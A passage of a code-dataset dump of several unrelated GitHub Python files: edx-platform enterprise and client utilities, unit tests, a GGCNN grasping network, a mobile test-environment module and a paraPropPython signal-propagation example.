make_event(campaign_id=args[0], timestamp=args[1], cost=args[2])\n\n\ndef setup_normalized_db(ch_client, events_args):\n normalized_existing = [make_event(*args) for args in events_args]\n ch_client.execute(\"INSERT INTO stat.normalized_sample VALUES\", normalized_existing)\n\n\ndef setup_charged_db(ch_client, events_args):\n charged_existing = [make_charged_event(*args) for args in events_args]\n ch_client.execute(\"INSERT INTO stat.accepted_sample VALUES\", charged_existing)\n\n\nclass Any:\n def __init__(self, _type):\n self._type = _type\n\n def __eq__(self, another):\n return isinstance(another, self._type)\n\n\ndef squash_whitespaces(source: str):\n return \" \".join(source.split())\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/tools (3).py","file_name":"tools (3).py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"12608038643","text":"\"\"\"\nHelper Methods\n\"\"\"\n\ntry:\n from braze.client import BrazeClient\nexcept ImportError:\n BrazeClient = None\nfrom django.conf import settings\ntry:\n from optimizely import optimizely\n from optimizely.config_manager import PollingConfigManager\nexcept ImportError:\n optimizely = None\n PollingConfigManager = None\n\n\ndef _get_key(key_or_id, key_cls):\n \"\"\"\n Helper method to get a course/usage key either from a string or a key_cls,\n where the key_cls (CourseKey or UsageKey) will simply be returned.\n \"\"\"\n return (\n key_cls.from_string(key_or_id)\n if isinstance(key_or_id, str)\n else key_or_id\n )\n\n\ndef get_braze_client():\n \"\"\" Returns a Braze client. \"\"\"\n if not BrazeClient:\n return None\n\n braze_api_key = settings.EDX_BRAZE_API_KEY\n braze_api_url = settings.EDX_BRAZE_API_SERVER\n\n if not braze_api_key or not braze_api_url:\n return None\n\n return BrazeClient(\n api_key=braze_api_key,\n api_url=braze_api_url,\n app_id='',\n )\n\n\nclass OptimizelyClient:\n \"\"\" Class for instantiating an Optimizely full stack client instance. \"\"\"\n optimizely_client = None\n\n @classmethod\n def get_optimizely_client(cls):\n if not optimizely:\n return None\n if not cls.optimizely_client:\n optimizely_sdk_key = settings.OPTIMIZELY_FULLSTACK_SDK_KEY\n if not optimizely_sdk_key:\n return None\n\n config_manager = PollingConfigManager(\n update_interval=10,\n sdk_key=optimizely_sdk_key,\n )\n cls.optimizely_client = optimizely.Optimizely(config_manager=config_manager)\n\n return cls.optimizely_client\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"}
+{"seq_id":"30236859490","text":"import unittest\nimport sys, os\nimport numpy as np\nsys.path.append(os.path.abspath(sys.path[0]) + '/../')\nfrom startracker.angular_distance import AngularDistance\nfrom startracker.star import Star\n\nclass AngularDistanceTest(unittest.TestCase):\n \n def setUp(self):\n star1 = Star(0,1,sph=(0,0))\n star2 = Star(1,1,sph=(np.pi,0))\n star3 = Star(2,1,sph=(np.pi/3,0))\n star4 = Star(3,1,sph=(np.pi/2,0))\n self.d1 = AngularDistance(star1,star2)\n self.d2 = AngularDistance(star1,star3)\n self.d3 = AngularDistance(star2,star3)\n self.d4 = AngularDistance(star1,star4)\n\n def test_equal_to_self(self):\n self.assertEquals(self.d1, self.d1)\n\n def test_not_equal_to_others(self):\n self.assertNotEquals(self.d1, self.d2)\n self.assertNotEquals(self.d1, self.d3)\n self.assertNotEquals(self.d1, self.d4)\n\n def test_check_triplet_true(self):\n self.assertEquals(self.d1.check_triplet(self.d2,self.d3), True)\n\n def test_check_triplet_false(self):\n self.assertEquals(self.d1.check_triplet(self.d2,self.d4), False)\n \n \n","repo_name":"ali-tny/lost-in-space","sub_path":"tests/test_angular_distance.py","file_name":"test_angular_distance.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"7163091445","text":"import torch\nimport torch.nn as nn\n\nclass GGCNN(nn.Module):\n def __init__(self, input_channel=1, filter_sizes=[32,16,8,8,16,32], kernel_sizes=[9, 5, 3, 3, 5, 9], strides=[3, 2, 2, 2, 2, 3], paddings=[3, 2, 1, 1, 2, 3]):\n super().__init__()\n # input channel은 depth image라서 1을 기본으로 지정한다.\n # input image H W = 300 300\n\n self.conv1 = nn.Conv2d(input_channel, filter_sizes[0], kernel_sizes[0], stride=strides[0], padding=paddings[0]) # output 100 100\n self.conv2 = nn.Conv2d(filter_sizes[0], filter_sizes[1], kernel_sizes[1], stride=strides[1], padding=paddings[1]) # output 50 50\n self.conv3 = nn.Conv2d(filter_sizes[1], filter_sizes[2], kernel_sizes[2], stride=strides[2], padding=paddings[2]) # output 25 25\n self.conv_trans1 = nn.ConvTranspose2D(filter_sizes[2], filter_sizes[3], kernel_sizes[3], stride=strides[3], padding=paddings[3], output_padding=1) # output 50 50\n self.conv_trans2 = nn.ConvTranspose2D(filter_sizes[3], filter_sizes[4], kernel_sizes[4], stride=strides[4], padding=paddings[4], output_padding=1) # output 100 100\n self.conv_trans3 = nn.ConvTranspose2D(filter_sizes[4], filter_sizes[5], kernel_sizes[5], stride=strides[5], padding=paddings[5], output_padding=1) # output 301 301. 의도적으로 1 크게 함\n self.relu = nn.ReLU()\n\n self.body = nn.Sequential( # input & output 300 300\n self.conv1, self.relu,\n self.conv2, self.relu,\n self.conv3, self.relu,\n self.conv_trans1, self.relu,\n self.conv_trans2, self.relu,\n self.conv_trans3, self.relu\n ) \n\n self.pos_output = nn.Conv2d(filter_sizes[5], 1, kernel_size=2) # output 300 300\n self.cos_output = nn.Conv2d(filter_sizes[5], 1, kernel_size=2) # output 300 300\n self.sin_output = nn.Conv2d(filter_sizes[5], 1, kernel_size=2) # output 300 300\n self.width_output = nn.Conv2d(filter_sizes[5], 1, kernel_size=2) # output 300 300\n\n def forward(self, x):\n x = self.body(x)\n pos_output = self.pos_output(x)\n cos_output = self.cos_output(x)\n sin_output = self.sin_output(x)\n width_output = self.width_output(x)\n\n return pos_output, cos_output, sin_output, width_output\n \n def loss(self, x_data, y_data):\n pos_real, cos_real, sin_real, width_real = y_data\n pos_pred, cos_pred, sin_pred, width_pred = self.forward(x_data)\n \n # use L2 loss\n loss = nn.MSELoss()\n pos_loss, cos_loss, sin_loss, width_loss = loss(pos_pred, pos_real), loss(cos_pred, cos_real), loss(sin_pred, sin_real), loss(width_pred, width_real)\n\n return {\n 'total_loss': pos_loss + cos_loss + sin_loss + width_loss,\n 'loss': {\n 'pos_loss': pos_loss,\n 'cos_loss': cos_loss,\n 'sin_loss': sin_loss,\n 'width_loss': width_loss\n },\n 'pred': {\n 'pos': pos_pred,\n 'cos': cos_pred,\n 'sin': sin_pred,\n 'width': width_pred\n }\n }\n","repo_name":"engineerJPark/GGCNN-reproduction","sub_path":"src/ggcnn/ggcnn_model.py","file_name":"ggcnn_model.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"12616988273","text":"\"\"\"\nUtility methods for Enterprise\n\"\"\"\n\n\nimport json\n\nfrom completion.exceptions import UnavailableCompletionData\nfrom completion.utilities import get_key_to_last_completed_block\nfrom crum import get_current_request\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom django.urls import NoReverseMatch, reverse\nfrom django.utils.translation import gettext as _\nfrom edx_django_utils.cache import TieredCache, get_cache_key\nfrom edx_toggles.toggles import WaffleFlag\nfrom enterprise.api.v1.serializers import EnterpriseCustomerBrandingConfigurationSerializer\nfrom enterprise.models import EnterpriseCustomer, EnterpriseCustomerUser\nfrom social_django.models import UserSocialAuth\n\nfrom common.djangoapps import third_party_auth\nfrom common.djangoapps.student.helpers import get_next_url_for_login_page\nfrom lms.djangoapps.branding.api import get_privacy_url\nfrom openedx.core.djangoapps.site_configuration import helpers as configuration_helpers\nfrom openedx.core.djangoapps.user_authn.cookies import standard_cookie_settings\nfrom openedx.core.djangolib.markup import HTML, Text\n\nENTERPRISE_HEADER_LINKS = WaffleFlag('enterprise.enterprise_header_links', __name__) # lint-amnesty, pylint: disable=toggle-missing-annotation\n\n\ndef get_data_consent_share_cache_key(user_id, course_id, enterprise_customer_uuid=None):\n \"\"\"\n Returns cache key for data sharing consent needed against user_id, course_id and enterprise_customer_uuid\n \"\"\"\n cache_key_params = dict(\n type='data_sharing_consent_needed',\n user_id=user_id,\n course_id=course_id,\n )\n\n if enterprise_customer_uuid:\n cache_key_params['enterprise_customer_uuid'] = enterprise_customer_uuid\n\n return get_cache_key(**cache_key_params)\n\n\ndef get_is_enterprise_cache_key(user_id):\n \"\"\"\n Returns cache key for the enterprise learner validation method needed against user_id.\n \"\"\"\n return get_cache_key(type='is_enterprise_learner', user_id=user_id)\n\n\ndef clear_data_consent_share_cache(user_id, course_id, enterprise_customer_uuid):\n \"\"\"\n clears data_sharing_consent_needed cache\n \"\"\"\n consent_cache_key = get_data_consent_share_cache_key(user_id, course_id, enterprise_customer_uuid)\n TieredCache.delete_all_tiers(consent_cache_key)\n\n\ndef update_logistration_context_for_enterprise(request, context, enterprise_customer):\n \"\"\"\n Take the processed context produced by the view, determine if it's relevant\n to a particular Enterprise Customer, and update it to include that customer's\n enterprise metadata.\n\n Arguments:\n request (HttpRequest): The request for the logistration page.\n context (dict): Context for logistration page.\n enterprise_customer (dict): data for enterprise customer\n\n \"\"\"\n sidebar_context = {}\n if enterprise_customer:\n is_proxy_login = request.GET.get('proxy_login')\n sidebar_context = get_enterprise_sidebar_context(enterprise_customer, is_proxy_login)\n\n if sidebar_context:\n context['data']['registration_form_desc']['fields'] = enterprise_fields_only(\n context['data']['registration_form_desc']\n )\n context.update(sidebar_context)\n context['enable_enterprise_sidebar'] = True\n context['data']['hide_auth_warnings'] = True\n context['data']['enterprise_name'] = enterprise_customer['name']\n else:\n context['enable_enterprise_sidebar'] = False\n\n update_third_party_auth_context_for_enterprise(request, context, enterprise_customer)\n\n\ndef get_enterprise_sidebar_context(enterprise_customer, is_proxy_login):\n 
\"\"\"\n Get context information for enterprise sidebar for the given enterprise customer.\n\n Args:\n enterprise_customer (dict): customer data from enterprise-customer endpoint, cached\n is_proxy_login (bool): If True, use proxy login welcome template\n\n Returns: Enterprise Sidebar Context with the following key-value pairs.\n {\n 'enterprise_name': 'Enterprise Name',\n 'enterprise_logo_url': 'URL of the enterprise logo image',\n 'enterprise_branded_welcome_string': 'Human readable welcome message customized for the enterprise',\n 'platform_welcome_string': 'Human readable welcome message for an enterprise learner',\n }\n \"\"\"\n platform_name = configuration_helpers.get_value('PLATFORM_NAME', settings.PLATFORM_NAME)\n\n branding_configuration = enterprise_customer.get('branding_configuration', {})\n logo_url = branding_configuration.get('logo', '') if isinstance(branding_configuration, dict) else ''\n\n if is_proxy_login:\n branded_welcome_template = configuration_helpers.get_value(\n 'ENTERPRISE_PROXY_LOGIN_WELCOME_TEMPLATE',\n settings.ENTERPRISE_PROXY_LOGIN_WELCOME_TEMPLATE\n )\n else:\n branded_welcome_template = configuration_helpers.get_value(\n 'ENTERPRISE_SPECIFIC_BRANDED_WELCOME_TEMPLATE',\n settings.ENTERPRISE_SPECIFIC_BRANDED_WELCOME_TEMPLATE\n )\n\n branded_welcome_string = Text(branded_welcome_template).format(\n start_bold=HTML(''),\n end_bold=HTML(''),\n line_break=HTML(' '),\n enterprise_name=enterprise_customer['name'],\n platform_name=platform_name,\n privacy_policy_link_start=HTML(\"\").format(\n pp_url=get_privacy_url()\n ),\n privacy_policy_link_end=HTML(\"\"),\n )\n\n platform_welcome_template = configuration_helpers.get_value(\n 'ENTERPRISE_PLATFORM_WELCOME_TEMPLATE',\n settings.ENTERPRISE_PLATFORM_WELCOME_TEMPLATE\n )\n platform_welcome_string = platform_welcome_template.format(platform_name=platform_name)\n\n return {\n 'enterprise_name': enterprise_customer['name'],\n 'enterprise_logo_url': logo_url,\n 'enterprise_branded_welcome_string': branded_welcome_string,\n 'platform_welcome_string': platform_welcome_string,\n }\n\n\ndef enterprise_fields_only(fields):\n \"\"\"\n Take the received field definition, and exclude those fields that we don't want\n to require if the user is going to be a member of an Enterprise Customer.\n \"\"\"\n enterprise_exclusions = configuration_helpers.get_value(\n 'ENTERPRISE_EXCLUDED_REGISTRATION_FIELDS',\n settings.ENTERPRISE_EXCLUDED_REGISTRATION_FIELDS\n )\n return [field for field in fields['fields'] if field['name'] not in enterprise_exclusions]\n\n\ndef update_third_party_auth_context_for_enterprise(request, context, enterprise_customer=None):\n \"\"\"\n Return updated context of third party auth with modified data for the given enterprise customer.\n\n Arguments:\n request (HttpRequest): The request for the logistration page.\n context (dict): Context for third party auth providers and auth pipeline.\n enterprise_customer (dict): data for enterprise customer\n\n Returns:\n context (dict): Updated context of third party auth with modified\n `errorMessage`.\n \"\"\"\n if context['data']['third_party_auth']['errorMessage']:\n context['data']['third_party_auth']['errorMessage'] = Text(_(\n 'We are sorry, you are not authorized to access {platform_name} via this channel. 
'\n 'Please contact your learning administrator or manager in order to access {platform_name}.'\n '{line_break}{line_break}'\n 'Error Details:{line_break}{error_message}')\n ).format(\n platform_name=configuration_helpers.get_value('PLATFORM_NAME', settings.PLATFORM_NAME),\n error_message=context['data']['third_party_auth']['errorMessage'],\n line_break=HTML(' ')\n )\n\n if enterprise_customer:\n context['data']['third_party_auth']['providers'] = []\n context['data']['third_party_auth']['secondaryProviders'] = []\n\n running_pipeline = third_party_auth.pipeline.get(request)\n if running_pipeline is not None:\n current_provider = third_party_auth.provider.Registry.get_from_pipeline(running_pipeline)\n if current_provider is not None and current_provider.skip_registration_form and enterprise_customer:\n # For enterprise (and later for everyone), we need to get explicit consent to the\n # Terms of service instead of auto submitting the registration form outright.\n context['data']['third_party_auth']['autoSubmitRegForm'] = False\n context['data']['third_party_auth']['autoRegisterWelcomeMessage'] = Text(_(\n 'Thank you for joining {platform_name}. '\n 'Just a couple steps before you start learning!')\n ).format(\n platform_name=configuration_helpers.get_value('PLATFORM_NAME', settings.PLATFORM_NAME)\n )\n context['data']['third_party_auth']['registerFormSubmitButtonText'] = _('Continue')\n\n return context\n\n\ndef handle_enterprise_cookies_for_logistration(request, response, context):\n \"\"\"\n Helper method for setting or deleting enterprise cookies on logistration response.\n\n Arguments:\n request (HttpRequest): The request for the logistration page.\n response (HttpResponse): The response for the logistration page.\n context (dict): Context for logistration page.\n\n \"\"\"\n # This cookie can be used for tests or minor features,\n # but should not be used for payment related or other critical work\n # since users can edit their cookies\n _set_experiments_is_enterprise_cookie(request, response, context['enable_enterprise_sidebar'])\n\n # Remove enterprise cookie so that subsequent requests show default login page.\n response.delete_cookie(\n configuration_helpers.get_value('ENTERPRISE_CUSTOMER_COOKIE_NAME', settings.ENTERPRISE_CUSTOMER_COOKIE_NAME),\n domain=configuration_helpers.get_value('BASE_COOKIE_DOMAIN', settings.BASE_COOKIE_DOMAIN),\n )\n\n\ndef _set_experiments_is_enterprise_cookie(request, response, experiments_is_enterprise):\n \"\"\" Sets the experiments_is_enterprise cookie on the response.\n This cookie can be used for tests or minor features,\n but should not be used for payment related or other critical work\n since users can edit their cookies\n \"\"\"\n cookie_settings = standard_cookie_settings(request)\n\n response.set_cookie(\n 'experiments_is_enterprise',\n json.dumps(experiments_is_enterprise),\n **cookie_settings\n )\n\n\ndef update_account_settings_context_for_enterprise(context, enterprise_customer, user):\n \"\"\"\n Take processed context for account settings page and update it taking enterprise customer into account.\n\n Arguments:\n context (dict): Context for account settings page.\n enterprise_customer (dict): data for enterprise customer\n user (User): request user\n \"\"\"\n enterprise_context = {\n 'enterprise_name': enterprise_customer['name'] if enterprise_customer else None,\n 'sync_learner_profile_data': _get_sync_learner_profile_data(enterprise_customer),\n 'edx_support_url': configuration_helpers.get_value('SUPPORT_SITE_LINK', 
settings.SUPPORT_SITE_LINK),\n 'enterprise_readonly_account_fields': {\n 'fields': list(get_enterprise_readonly_account_fields(user))\n }\n }\n context.update(enterprise_context)\n\n\ndef get_enterprise_readonly_account_fields(user):\n \"\"\"\n Returns a set of account fields that are read-only for enterprise users.\n \"\"\"\n # TODO circular dependency between enterprise_support.api and enterprise_support.utils\n from openedx.features.enterprise_support.api import enterprise_customer_for_request\n enterprise_customer = enterprise_customer_for_request(get_current_request())\n\n enterprise_readonly_account_fields = list(settings.ENTERPRISE_READONLY_ACCOUNT_FIELDS)\n\n # if user has no `UserSocialAuth` record then allow to edit `fullname`\n # whether the `sync_learner_profile_data` is enabled or disabled\n user_social_auth_record = _user_has_social_auth_record(user, enterprise_customer)\n if not user_social_auth_record:\n enterprise_readonly_account_fields.remove('name')\n\n sync_learner_profile_data = _get_sync_learner_profile_data(enterprise_customer)\n return set(enterprise_readonly_account_fields) if sync_learner_profile_data else set()\n\n\ndef _user_has_social_auth_record(user, enterprise_customer):\n \"\"\"\n Return True if a `UserSocialAuth` record exists for `user` False otherwise.\n \"\"\"\n provider_backend_names = []\n if enterprise_customer and enterprise_customer['identity_providers']:\n for idp in enterprise_customer['identity_providers']:\n identity_provider = third_party_auth.provider.Registry.get(\n provider_id=idp['provider_id']\n )\n provider_backend_names.append(identity_provider.backend_name)\n return UserSocialAuth.objects.select_related('user').\\\n filter(provider__in=provider_backend_names, user=user).exists()\n return False\n\n\ndef _get_sync_learner_profile_data(enterprise_customer):\n \"\"\"\n Returns whether the configuration of the given enterprise customer supports\n synching learner profile data.\n \"\"\"\n if enterprise_customer:\n identity_provider = third_party_auth.provider.Registry.get(\n provider_id=enterprise_customer['identity_provider'],\n )\n if identity_provider:\n return identity_provider.sync_learner_profile_data\n\n return False\n\n\ndef get_enterprise_learner_portal(request):\n \"\"\"\n Gets the formatted portal name and slug that can be used\n to generate a link for an enabled enterprise Learner Portal.\n\n Caches and returns result in/from the user's request session if provided.\n \"\"\"\n # Prevent a circular import.\n from openedx.features.enterprise_support.api import enterprise_enabled, enterprise_customer_uuid_for_request\n\n user = request.user\n # Only cache this if a learner is authenticated (AnonymousUser exists and should not be tracked)\n\n learner_portal_session_key = 'enterprise_learner_portal'\n\n if enterprise_enabled() and ENTERPRISE_HEADER_LINKS.is_enabled() and user and user.id:\n # If the key exists return that value\n if learner_portal_session_key in request.session:\n return json.loads(request.session[learner_portal_session_key])\n\n kwargs = {\n 'user_id': user.id,\n 'enterprise_customer__enable_learner_portal': True,\n }\n enterprise_customer_uuid = enterprise_customer_uuid_for_request(request)\n if enterprise_customer_uuid:\n kwargs['enterprise_customer__uuid'] = enterprise_customer_uuid\n\n queryset = EnterpriseCustomerUser.objects.filter(**kwargs).prefetch_related(\n 'enterprise_customer',\n 'enterprise_customer__branding_configuration',\n )\n\n if not enterprise_customer_uuid:\n # If the request doesn't help us know 
which Enterprise Customer UUID to select with,\n # order by the most recently activated/modified customers,\n # so that when we select the first result of the query as the preferred\n # customer, it's the most recently active one.\n queryset = queryset.order_by('-enterprise_customer__active', '-modified')\n\n preferred_enterprise_customer_user = queryset.first()\n if not preferred_enterprise_customer_user:\n return None\n\n enterprise_customer = preferred_enterprise_customer_user.enterprise_customer\n learner_portal_data = {\n 'name': enterprise_customer.name,\n 'slug': enterprise_customer.slug,\n 'logo': enterprise_branding_configuration(enterprise_customer).get('logo'),\n }\n\n # Cache the result in the user's request session\n request.session[learner_portal_session_key] = json.dumps(learner_portal_data)\n return learner_portal_data\n return None\n\n\ndef enterprise_branding_configuration(enterprise_customer_obj):\n \"\"\"\n Given an instance of ``EnterpriseCustomer``, returns a related\n branding_configuration serialized dictionary if it exists, otherwise\n the serialized default EnterpriseCustomerBrandingConfiguration object.\n\n EnterpriseCustomerBrandingConfigurationSerializer will use default values\n for any empty branding config fields.\n \"\"\"\n branding_config = enterprise_customer_obj.safe_branding_configuration\n return EnterpriseCustomerBrandingConfigurationSerializer(branding_config).data\n\n\ndef get_enterprise_learner_generic_name(request):\n \"\"\"\n Get a generic name concatenating the Enterprise Customer name and 'Learner'.\n\n ENT-924: Temporary solution for hiding potentially sensitive SSO names.\n When a more complete solution is put in place, delete this function and all of its uses.\n \"\"\"\n # Prevent a circular import. This function makes sense to be in this module though. And see function description.\n from openedx.features.enterprise_support.api import enterprise_customer_for_request\n\n # ENT-2626: For 404 pages we don't need to perform these actions.\n if getattr(request, 'view_name', None) == '404':\n return\n\n enterprise_customer = enterprise_customer_for_request(request)\n\n return (\n enterprise_customer['name'] + 'Learner'\n if enterprise_customer and enterprise_customer['replace_sensitive_sso_username']\n else ''\n )\n\n\ndef is_enterprise_learner(user):\n \"\"\"\n Check if the given user belongs to an enterprise. 
Cache the value if an enterprise learner is found.\n\n Arguments:\n user (User): Django User object or Django User object id.\n\n Returns:\n (bool): True if given user is an enterprise learner.\n \"\"\"\n # Prevent a circular import.\n from openedx.features.enterprise_support.api import enterprise_enabled\n\n if not enterprise_enabled():\n return False\n\n try:\n user_id = int(user)\n except TypeError:\n user_id = user.id\n cached_is_enterprise_key = get_is_enterprise_cache_key(user_id)\n if cache.get(cached_is_enterprise_key):\n return True\n\n if EnterpriseCustomerUser.objects.filter(user_id=user_id).exists():\n # Cache the enterprise user for one hour.\n cache.set(cached_is_enterprise_key, True, 3600)\n return True\n\n return False\n\n\ndef get_enterprise_slug_login_url():\n \"\"\"\n Return the enterprise slug login's URL (enterprise/login) if it exists otherwise None\n \"\"\"\n try:\n return reverse('enterprise_slug_login')\n except NoReverseMatch:\n return None\n\n\ndef get_provider_login_url(request, provider_id, redirect_url=None):\n \"\"\"\n Return the given provider's login URL.\n\n This method is here to avoid the importing of pipeline and student app in enterprise.\n \"\"\"\n\n provider_login_url = third_party_auth.pipeline.get_login_url(\n provider_id,\n third_party_auth.pipeline.AUTH_ENTRY_LOGIN,\n redirect_url=redirect_url if redirect_url else get_next_url_for_login_page(request)\n )\n return provider_login_url\n\n\ndef fetch_enterprise_customer_by_id(enterprise_uuid):\n return EnterpriseCustomer.objects.get(uuid=enterprise_uuid)\n\n\ndef is_course_accessed(user, course_id):\n \"\"\"\n Check if the learner accessed the course.\n\n Arguments:\n user (User): Django User object.\n course_id (String): The course identifier\n\n Returns:\n (bool): True if course has been accessed by the enterprise learner.\n \"\"\"\n try:\n get_key_to_last_completed_block(user, course_id)\n return True\n except UnavailableCompletionData:\n return False\n","repo_name":"openedx/edx-platform","sub_path":"openedx/features/enterprise_support/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":19632,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"}
+{"seq_id":"31563718290","text":"\nfrom pypy.lang.gameboy.interrupt import *\nfrom pypy.lang.gameboy import constants\n\ndef get_interrupt():\n return Interrupt()\n\n\n\ndef test_reset():\n interrupt = get_interrupt()\n assert interrupt.enable == 0\n assert interrupt.get_interrupt_flag() == 0xE0 | constants.VBLANK\n interrupt.enable = 1\n interrupt.flag = ~constants.VBLANK\n interrupt.reset()\n assert interrupt.enable == 0\n assert interrupt.get_interrupt_flag() == 0xE0 | constants.VBLANK\n \n \ndef test_is_pending():\n interrupt = get_interrupt()\n assert interrupt.is_pending() == False\n assert interrupt.is_pending(0x00) == False\n interrupt.set_interrupt_enable(True)\n assert interrupt.is_pending()\n \n \ndef test_is_pending_common_masks():\n interrupt = get_interrupt()\n for flag in interrupt.interrupt_flags:\n interrupt.reset()\n interrupt.enable = True\n assert interrupt.v_blank.is_pending()\n flag.set_pending(True)\n assert interrupt.is_pending(flag.mask)\n \n \ndef test_raise_lower_interrupt():\n interrupt = get_interrupt()\n masks= [constants.LCD, constants.TIMER, \n constants.JOYPAD, constants.SERIAL]\n interrupt.set_interrupt_enable(True)\n interrupt.v_blank.set_pending(True)\n for mask in masks:\n interrupt.raise_interrupt(mask)\n assert interrupt.mask_mapping[mask].is_pending() == True\n assert interrupt.is_pending(mask) == True\n interrupt.lower(mask)\n assert interrupt.is_pending(mask) == False\n \ndef test_read_write():\n interrupt = get_interrupt()\n value = 1\n interrupt.write(constants.IE, value)\n assert interrupt.enable == value\n assert interrupt.read(constants.IE) == value\n \n interrupt.reset()\n value = constants.LCD\n interrupt.write(constants.IF, value)\n assert interrupt.get_interrupt_flag() == 0xE0 | value\n assert interrupt.read(constants.IF) == 0xE0 | value\n","repo_name":"camillobruni/pygirl","sub_path":"pypy/lang/gameboy/test/test_interrupt.py","file_name":"test_interrupt.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"}
+{"seq_id":"30429334530","text":"__version__ = '1.0'\n__license__ = \"EPL 1\"\n__author__ = [ 'Eing Ong @eingong' ]\n\nimport os\n\nclass testEnv:\n \"\"\" Reads in environment variables used in tests. \n Examples:\n MOET - /Users//moet\n MOET_DEVICE - bb8130/bb9550/android/iphone\n MOET_OS - 5.0.0/2.2/4.2\n MOET_RESOLUTION - 240x320/320x480/480x800\n MOET_RESULTS - $MOET/results\n MOET_MODE - CAPTURE/TEST/DEMO\n IMAGE_TOOL (if not in system PATH)\n \"\"\"\n\n runOptionList = ('CAPTURE', 'TEST', 'DEMO')\n\n def __init__(self):\n self.devicePin = os.getenv('DEVICE_PIN')\n self.devicePort = os.getenv('DEVICE_PORT')\n self.rimHome = os.getenv('RIM_HOME')\n self.version = os.getenv('Version')\n self.imageTool = os.getenv('IMAGE_TOOL')\n self.testroot = os.getenv('MOET')\n if not self.testroot is None:\n self.resources = os.path.join(self.testroot, 'resources')\n self.mobileDevice = os.getenv('MOET_DEVICE')\n if not self.mobileDevice is None:\n self.fullDevice = self.mobileDevice\n self.mobileDevice = self.mobileDevice.lower()\n self.resources = os.path.join(self.resources, self.mobileDevice)\n self.deviceOS = os.getenv('MOET_OS')\n if not self.deviceOS is None:\n self.fullDevice = self.fullDevice + '-' + self.deviceOS \n self.runOption = os.getenv('MOET_MODE')\n self.orientation = os.getenv('ORIENTATION')\n self.testoutput = os.getenv('MOET_RESULTS')\n self.res = os.getenv('MOET_RESOLUTION')\n if not self.res is None:\n self.resX = self.res.split('x')[0]\n self.resY = self.res.split('x')[1]\n if not self.res is None:\n self.resources = os.path.join(self.resources, self.res)\n\n def setDeviceOS(self, deviceOS):\n self.deviceOS = deviceOS\n\n def getResolution(self):\n return self.res\n\n def getFullDevice(self):\n return self.fullDevice\n\n def getImageTool(self):\n return self.imageTool\n\n def getRunOption(self):\n if isinstance(self.runOption, str) == False or self.runOption == '':\n self.runOption = self.runOptionList[1] \n return self.runOption.upper()\n\n def setRunOption(self, runOption):\n if isinstance(runOption, str) == False or self.runOption == '':\n self.runOption = self.runOptionList[1] \n self.runOption = runOption\n\n def getMobileDevice(self):\n return self.mobileDevice\n\n def getSimulatorHome(self):\n return self.simulatorHome\n\n def getTestRoot(self):\n return self.testroot\n\n def getTestOutput(self):\n return self.testoutput\n\n def getDeviceClass(self):\n \"\"\" Returns the device to test \"\"\"\n mobileDevice = self.getMobileDevice()\n\n if mobileDevice == 'android':\n import android \n deviceClass = android.AndroidImpl()\n elif mobileDevice == 'iphone':\n import iphone \n deviceClass = iphone.iPhoneImpl()\n elif mobileDevice == 'pearl':\n import pearl \n deviceClass = pearl.PearlImpl()\n elif mobileDevice == 'storm':\n import storm\n deviceClass = storm.StormImpl()\n else:\n import bb\n deviceClass = bb.BlackBerryImpl()\n return deviceClass\n\n def updateEnv(self, variable, value):\n \"\"\" Update existing environment variable with value \"\"\"\n\n keys = os.environ.keys()\n from re import search\n for key in keys:\n if not search(variable, key):\n os.environ[variable]=value\n \n\n\"\"\" Create an instance of settings \"\"\"\nsettings = testEnv()\n","repo_name":"eing/moet","sub_path":"common/testlib.py","file_name":"testlib.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"3"}
+{"seq_id":"5075073008","text":"# paraPropPython time-dependent signal example use of paraPropPython.py notebook\n# s. prohira, c. sbrocco\n\nimport paraPropPython as ppp\nfrom receiver import receiver\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport util as util\nimport time\n\n##### time-dependent example #####\n\n### first, initialize an instance of paraProp by defining its dimensions and frequency of interest ###\niceDepth = 200. # m\niceLength = 100. # m\ndx = 1 # m\ndz = 0.05 # m\n\nfreq = 0.15\n\n### it is useful to set the reference depth as the source depth when you only have one transmitter ###\nsourceDepth = 30. # m\nsim = ppp.paraProp(iceLength, iceDepth, dx, dz, refDepth=sourceDepth, airHeight=1)\n\ndef southpole(z):\n A=1.78\n B=-0.43\n C=-0.0132\n return A+B*np.exp(C*z)\nsim.set_n(nFunc=southpole)\n\nsim.set_dipole_source_profile(freq, sourceDepth)\n\n### set a td signal ###\ndt = 1\nimpulse = np.zeros(2**8, dtype='complex')\nimpulse[10] = 1+0j\nsig = util.normToMax(util.butterBandpassFilter(impulse, 0.09, 0.25, 1/dt, 4))\nsim.set_td_source_signal(sig, dt)\n\nrxList = [receiver(100, 25)]\ntic = time.perf_counter()\n### run the solver ###\nsim.do_solver(rxList)\ntoc = time.perf_counter()\nprint(f\"Time: {toc-tic:0.4} seconds\")\n\nrx = rxList[0]\nt = rx.get_time()\nsig = rx.get_signal().real\nf = rx.get_frequency()\nspec = rx.get_spectrum()\n\nwrapped = np.roll(sig, -np.argmax(sig)+45)\nplt.plot(t, wrapped/max(wrapped))\nplt.xlabel(\"Time (ns)\")\nplt.ylabel(\"Field (norm.)\")\nplt.show()\nplt.plot(f, abs(spec)) \nplt.xlabel(\"Frequency (GHz)\")\nplt.ylabel(\"Mag. (abs)\")\n#plt.xlim(0,0.5)\nplt.show()","repo_name":"prchyr/paraPropPython","sub_path":"td.py","file_name":"td.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
